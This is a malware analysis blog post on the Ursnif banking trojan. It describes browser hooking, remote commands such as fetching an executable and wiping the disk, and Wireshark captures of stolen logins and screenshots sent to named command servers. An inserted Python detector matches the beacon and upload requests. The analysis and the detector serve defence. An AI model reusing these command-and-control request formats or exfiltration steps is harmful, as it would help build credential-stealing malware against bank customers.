Tuesday, October 16, 2012

Trojan.Spy.Ursnif.F

Spreading: medium
Damage: high
Size: approx 50k
Discovered: 2010 Oct 20

SYMPTOMS:
Extra HTTP traffic.

TECHNICAL DESCRIPTION:
Trojan.Spy.Ursnif is a malware that is able to steal personal information and control the infected computer.
It finds out the type of browser (iexplorer, firefox, safari, chrome, opera), information used later for stealing specific passwords.
It takes a snapshot of all the processes, injects itself into iexplore or firefox and also hooks some functions (InternetReadFile, InternetWriteFile, CreateProcess, HttpSendRequest) to intercept browser traffic.
The backdoor behaviour starts when it connects to a server that appears under different host names: rettinasl.com, hasterulits.com, thecargotime.com, tryfindithere.com. From time to time it sends requests to the server. The request has a standard form:
    GET /cgi-bin/cmd.cgi?user_id=2806922672&version_id=2037028&passphrase=fkjvhsdvlksdhvlsd&socks=0&version=2037028&crc=00000000 HTTP/1.1

    The version id is memorized in a registry key:    
        Subkey = HKCU\Software\AppDataLow\{0a7cdb08-42c7-a17a-bc91-b0554eeb624f}
        Value    = Version
        Data      = Hex:001F1524 , Decimal:2037028
    The user_id is random.

    If the request succeeds and the connection is established the malware takes control:
      - it receives commands:
            - download: DL_EXE=http://ne[removed].cn/sol.exe /DL_EXE_ST=http://ne[removed].cn /sol.exe ;
            - kill windows: KILL (writes to "\\.\C:" a buffer of size 0x10000 (the module of the current process));
            - reboot system: REBOOT;
            - take screenshots: SCREENSHOT;
            - delete cookies: CLEAR_COOK;

      - when the user logs on to different internet accounts it sends the private information (user name, passwords) to a remote location:
            example Wireshark capture:

            POST /cgi-bin/forms.cgi HTTP/1.1
            Content-Type: multipart/form-data; boundary=--------------------------2b01852b01852b0185
            User-Agent: IE
            Host: tryfindithere.com
            Content-Length: 337
            Cache-Control: no-cache
            ----------------------------2b01852b01852b0185
            Content-Disposition: form-data; name="upload_file"; filename="2806922672.2037028"
            Content-Type: application/octet-stream
             URL: http://fa[removed]war.com/index.php
            login_username=TEST&login_password=TEST&serverid=1&submitit.x=89&submitit.y=23
     
        - it downloads an encrypted buffer into a memory location; the decrypted content holds:
            - the names of some bank websites: millenniumbcp.pt, santandertotta.pt, grupobanif, caixaebanking.cgd.pt;
            - some JavaScript code to identify and steal passwords, user names and card PINs from those bank websites;

        - also, when the user logs on to those bank websites, screenshot pictures are sent to a remote location:
            example Wireshark capture:

            POST /cgi-bin/ss.cgi HTTP/1.1
            Content-Type: multipart/form-data; boundary=--------------------------905c4c905c4c905c4c
            User-Agent: IE
            Host: thecargotime.com
            Content-Length: 146030
            Cache-Control: no-cache
            ----------------------------905c4c905c4c905c4c
            Content-Disposition: form-data; name="upload_file"; filename="2806922672.2037028"
            Content-Type: application/octet-stream
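
The beacon and the two upload endpoints described above share one identity, the "<user_id>.<version_id>" pair, which appears in the GET query and again as the upload filename. The following detector is an added example written for this post (not the malware's or any vendor's code): it classifies HTTP request lines from a proxy log, using constructed sample traffic modelled on the captures, and correlates beacon and exfiltration hits by that pair.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Beacon: GET /cgi-bin/cmd.cgi with exactly this parameter set (from the write-up).
BEACON_PARAMS = {"user_id", "version_id", "passphrase", "socks", "version", "crc"}
# Upload endpoints named in the captured POSTs, mapped to what they carry.
EXFIL_PATHS = {"/cgi-bin/forms.cgi": "form-grab", "/cgi-bin/ss.cgi": "screenshot"}
# The upload filename is "<user_id>.<version_id>" in both captures.
FILENAME_RE = re.compile(r'filename="(\d+)\.(\d+)"')


def classify_request(request_line, headers_and_body=""):
    """Return (kind, {'user_id', 'version_id'}) for a matching request, else None.
    kind is 'beacon', 'form-grab' or 'screenshot'."""
    parts = request_line.split()
    if len(parts) < 2:
        return None
    method, target = parts[0], parts[1]
    url = urlsplit(target)
    if method == "GET" and url.path == "/cgi-bin/cmd.cgi":
        qs = parse_qs(url.query)
        # Require the full parameter set and the duplicated version field to agree.
        if set(qs) == BEACON_PARAMS and qs["version_id"] == qs["version"]:
            return ("beacon", {"user_id": qs["user_id"][0], "version_id": qs["version_id"][0]})
    if method == "POST" and url.path in EXFIL_PATHS:
        m = FILENAME_RE.search(headers_and_body)
        if m:
            return (EXFIL_PATHS[url.path], {"user_id": m.group(1), "version_id": m.group(2)})
    return None


def correlate(requests):
    """Group hits by (user_id, version_id) so a beacon and the later uploads
    from the same infection land in one bucket."""
    by_bot = {}
    for line, rest in requests:
        hit = classify_request(line, rest)
        if hit:
            kind, ident = hit
            by_bot.setdefault((ident["user_id"], ident["version_id"]), []).append(kind)
    return by_bot


# Constructed sample traffic (not real logs); the passphrase value is a placeholder.
SAMPLE = [
    ("GET /cgi-bin/cmd.cgi?user_id=2806922672&version_id=2037028&passphrase=x&socks=0&version=2037028&crc=00000000 HTTP/1.1", ""),
    ("POST /cgi-bin/forms.cgi HTTP/1.1", 'Content-Disposition: form-data; name="upload_file"; filename="2806922672.2037028"'),
    ("POST /cgi-bin/ss.cgi HTTP/1.1", 'Content-Disposition: form-data; name="upload_file"; filename="2806922672.2037028"'),
    ("GET /cgi-bin/cmd.cgi?user_id=1&foo=2 HTTP/1.1", ""),  # wrong parameter set: ignored
    ("POST /index.php HTTP/1.1", 'filename="1.2"'),         # ordinary upload path: ignored
]

if __name__ == "__main__":
    for bot, kinds in correlate(SAMPLE).items():
        print(bot, kinds)
```

Matching on the complete parameter set rather than on the host names keeps the rule useful when the operators rotate domains, as the four names listed above suggest they do.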
  
       It creates events with restricted rights: denied for guest and anonymous users (D:(D;OICI;GA;;;BG)(D;OICI;GA;;;AN)(A;OICI;GA;;;AU)(A;OICI;GA;;;BA), i.e. generic access is denied to Builtin Guests and Anonymous and allowed to Authenticated Users and Builtin Administrators).
       Every action is executed by threads that are synchronized using critical sections or events.
       It uses a pipe for communication between threads (read/write).
